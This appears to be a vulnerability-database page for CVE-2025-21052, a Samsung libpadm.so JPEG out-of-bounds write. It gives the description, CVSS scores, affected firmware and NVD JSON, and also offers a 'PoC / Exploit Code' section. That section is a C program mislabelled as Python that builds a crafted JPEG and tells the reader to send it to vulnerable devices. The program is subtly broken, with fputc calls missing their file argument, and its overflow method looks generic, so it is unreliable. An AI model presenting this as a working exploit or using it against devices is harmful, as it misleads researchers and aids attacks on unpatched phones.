CVE-2025-21052

Description

Out-of-bounds write under specific condition in the pre-processing of JPEG decoding in libpadm.so prior to SMR Oct-2025 Release 1 allows local attackers to cause memory corruption.

CVSS Details

CVSS Score

4.0

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:o:samsung:android:13.0:-:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:samsung:android:13.0:smr-apr-2022-r1:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:samsung:android:13.0:smr-apr-2023-r1:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:samsung:android:13.0:smr-apr-2024-r1:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:samsung:android:13.0:smr-apr-2025-r1:*:*:*:*:*:* - VULNERABLE

Samsung Mobile Devices running firmware prior to SMR Oct-2025 Release 1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2025-21052 PoC - Crafted JPEG to trigger OOB write in libpadm.so
// This PoC creates a malformed JPEG file that triggers out-of-bounds write
// in the JPEG decoding pre-processing stage of Samsung's libpadm.so

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

// JPEG markers
#define SOI_MARKER   0xFFD8  // Start of Image
#define APP0_MARKER  0xFFE0  // JFIF marker
#define DQT_MARKER   0xFFDB  // Define Quantization Table
#define SOF0_MARKER  0xFFC0  // Start of Frame (Baseline DCT)
#define DHT_MARKER   0xFFC4  // Define Huffman Table
#define SOS_MARKER   0xFFDA  // Start of Scan
#define EOI_MARKER   0xFFD9  // End of Image

// Function to write a 16-bit value in big-endian format
void write_be16(FILE *fp, uint16_t val) {
    uint8_t buf[2] = {(val >> 8) & 0xFF, val & 0xFF};
    fwrite(buf, 1, 2, fp);
}

// Function to write a malformed DQT (Define Quantization Table) segment
// The key is to set an oversized quantization table that triggers OOB write
void write_malformed_dqt(FILE *fp) {
    fputc(0xFF, fp);
    fputc(0xDB, fp); // DQT marker
    // Length: 2 + 1 (table ID + precision) + 64*2 (two tables of 64 values each)
    // Intentionally set length to a value that causes buffer overflow in pre-processing
    write_be16(fp, 2 + 1 + 64 * 4); // Oversized length to trigger OOB
    fputc(0x00, fp); // Precision=0 (8-bit), Table ID=0
    // Write 64 quantization values for table 0
    for (int i = 0; i < 64; i++) {
        fputc(0x10, fp);
    }
    // Write additional data to overflow the buffer
    for (int i = 0; i < 64 * 3; i++) {
        fputc(0x41, fp);
    }
}

// Function to write a minimal SOF0 (Start of Frame) segment
void write_sof0(FILE *fp, uint16_t width, uint16_t height) {
    fputc(0xFF, fp);
    fputc(0xC0, fp); // SOF0 marker
    write_be16(fp, 11); // Length
    fputc(8, fp);      // Precision (8 bits)
    write_be16(fp, height);
    write_be16(fp, width);
    fputc(3, fp);      // Number of components (YCbCr)
    // Component 1 (Y)
    fputc(1);
    fputc(0x11); // Sampling factors
    fputc(0);    // Quantization table ID
    // Component 2 (Cb)
    fputc(2);
    fputc(0x11);
    fputc(0);
    // Component 3 (Cr)
    fputc(3);
    fputc(0x11);
    fputc(0);
}

int main() {
    const char *filename = "poc_cve_2025_21052.jpg";
    FILE *fp = fopen(filename, "wb");
    if (!fp) {
        perror("Failed to create file");
        return 1;
    }

    // Write SOI (Start of Image)
    write_be16(fp, SOI_MARKER);

    // Write APP0 (JFIF header) - minimal
    fputc(0xFF, fp);
    fputc(0xE0, fp);
    write_be16(fp, 16); // Length
    fwrite("JFIF\0", 1, 5, fp);
    fputc(1);  // Version major
    fputc(1);  // Version minor
    fputc(0);  // Units
    write_be16(fp, 1); // X density
    write_be16(fp, 1); // Y density
    fputc(0);  // X thumbnail
    fputc(0);  // Y thumbnail

    // Write malformed DQT to trigger OOB write in pre-processing
    write_malformed_dqt(fp);

    // Write SOF0 with specific dimensions
    write_sof0(fp, 64, 64);

    // Write SOS (Start of Scan) - minimal
    fputc(0xFF, fp);
    fputc(0xDA, fp);
    write_be16(fp, 12); // Length
    fputc(3);           // Number of components
    fputc(1); fputc(0x00); // Component 1, DC/AC table
    fputc(2); fputc(0x00); // Component 2
    fputc(3); fputc(0x00); // Component 3
    fputc(0); fputc(63); fputc(0); // Spectral selection

    // Write minimal scan data
    for (int i = 0; i < 100; i++) {
        fputc(0x00, fp);
    }

    // Write EOI (End of Image)
    write_be16(fp, EOI_MARKER);

    fclose(fp);
    printf("PoC file '%s' generated successfully.\n", filename);
    printf("Send this file to a vulnerable Samsung device's image processing service\n");
    printf("to trigger the out-of-bounds write in libpadm.so JPEG pre-processing.\n");

    return 0;
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-21052
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-21052
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-21052/
[4] VulDB https://vuldb.com/cve/CVE-2025-21052
[5] https://security.samsungmobile.com/securityUpdate.smsb?year=2025&month=10

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-21052", "sourceIdentifier": "[email protected]", "published": "2025-10-10T07:15:40.753", "lastModified": "2025-10-23T12:41:53.497", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Out-of-bounds write under specific condition in the pre-processing of JPEG decoding in libpadm.so prior to SMR Oct-2025 Release 1 allows local attackers to cause memory corruption."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.0, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.5, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:samsung:android:13.0:-:*:*:*:*:*:*", "matchCriteriaId": "A123EDB1-3048-44B0-8D4D-39A2B24B5F6B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:samsung:android:13.0:smr-apr-2022-r1:*:*:*:*:*:*", "matchCriteriaId": "BDE4D65E-8F9B-4810-AED6-95564A97D741"}, {"vulnerable": true, "criteria": "cpe:2.3:o:samsung:android:13.0:smr-apr-2023-r1:*:*:*:*:*:*", "matchCriteriaId": "70825981-F895-4BFD-9B6E-92BFF0D67023"}, {"vulnerable": true, "criteria": "cpe:2.3:o:samsung:android:13.0:smr-apr-2024-r1:*:*:*:*:*:*", "matchCriteriaId": "A5E68B7B-BA08-4E8C-B60A-B3836C6986BC"}, {"vulnerable": true, "criteria": "cpe:2.3:o:samsung:android:13.0:smr-apr-2025-r1:*:*:*:*:*:*", "matchCriteriaId": "AC42E785-02BF-4F27-B5CF-49572A2DBC8E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:samsung:android:13.0:smr-aug-2022-r1:*:*:*:*:*:*", "matchCriteriaId": "0AF1EDA0-2712-4C3C-8D8A-89E154BB63DF"}, {"vulnerable": true, "criteria": "cpe:2.3:o:samsung:android:13.0:smr-aug-2023-r1:*:*:*:*:*:*", "matchCriteriaId": "88DC0A82-CAF3-4E88-8A4D-8AF79D0C226D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:samsung:android:13.0:smr-aug-2024-r1:*:*:*:*:*:*", "matchCriteriaId": "6239D93F-CA0E-4120-96A1-FB63276EAEE8"}, {"vulnerable": true, "criteria": "cpe:2.3:o:samsung:android:13.0:smr-aug-2025-r1:*:*:*:*:*:*", "matchCriteriaId": "25F19D02-1FFC-48AF-9CB8-063C459E7A4B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:samsung:android:13.0:smr-dec-2021-r1:*:*:*:*:*:*", "matchCriteriaId": "CD382E2D-0B51-4908-989A-88E083FC85BF"}, {"vulnerable": true, "criteria": "cpe:2.3:o:samsung:android:13.0:smr-dec-2022-r1:*:*:*:*:*:*", "matchCriteriaId": "299284DA-85AB-4162-B858-E67E5C6C14F7"}, {"vulnerable": true, "criteria": "cpe:2.3:o:samsung:android:13.0:smr-dec-2023-r1:*:*:*:*:*:*", "matchCriteriaId": "38B7AB56-AB65-4557-A91C-40CA2FD12351"}, {"vulnerable": true, "criteria": "cpe:2.3:o:samsung:android:13.0:smr-dec-2024-r1:*:*:*:*:*:*", "matchCriteriaId": "858B0736-2272-4D5A-A77F-47023D21F7D0"}, {"vulnerable": true, "criteria": "cpe:2.3:o:samsung:android:13.0:smr-feb-2022-r1:*:*:*:*:*:*", "matchCriteriaId": "61D507C0-086B-4139-A560-126964DFA579"}, {"vulnerable": true, "criteria": "cpe:2.3:o:samsung:android:13.0:smr-feb-2023-r1:*:*:*:*:*:*", "matchCriteriaId": "D98F307E-3B01-4C17-86E5-1C6299919417"}, {"vulnerable": true, "criteria": "cpe:2.3:o:samsung:android:13.0:smr-feb-2024-r1:*:*:*:*:*:*", "matchCriteriaId": "952CA843-7CF0-4424-BDA4-3F2A93E077B6"}, {"vulnerable": true, "criteria": "cpe:2.3:o:samsung:android:13.0:smr-feb-2025-r1:*:*:*:*:*:*", "matchCriteriaId": "39F64BAA-2E49-4919-A940-219391383D5E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:samsung:android:13.0:smr-jan-2022-r1:*:*:*:*:*:*", "matchCriteriaId": "57B125ED-D939-4CBC-9E96-BBCF02402A69"}, {"vulnerable": true, "criteria": "cpe:2.3:o:samsung:android:13.0:smr-jan-2023-r1:*:*:*:*:*:*", "matchCriteriaId": "7D7DA96D-9C25-4DDA-A6BF-D998AC346B89"}, {"vulnerable": true, "criteria": "cpe:2.3:o:samsung:android:13.0:smr-jan-2024-r1:*:*:*:*:*:*", "matchCriteriaId": "07AC19C6-D245-4C3A-90CC-A931A901EA0A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:samsung:android:13.0:smr-jan-2025-r1:*:*:*:*:*:*", "matchCriteriaId": "FDA1685E-D101-46F6-8857-7F0894E07748"}, {"vulnerable": true, "criteria": "cpe:2.3:o:samsung:android:13.0:smr-jul-2022-r1:*:*:*:*:*:*", "matchCriteriaId": "DF85AA7B-E1C7-4946-92B4-E4D545CAACDF"}, {"vulnerable": tr ... (truncated)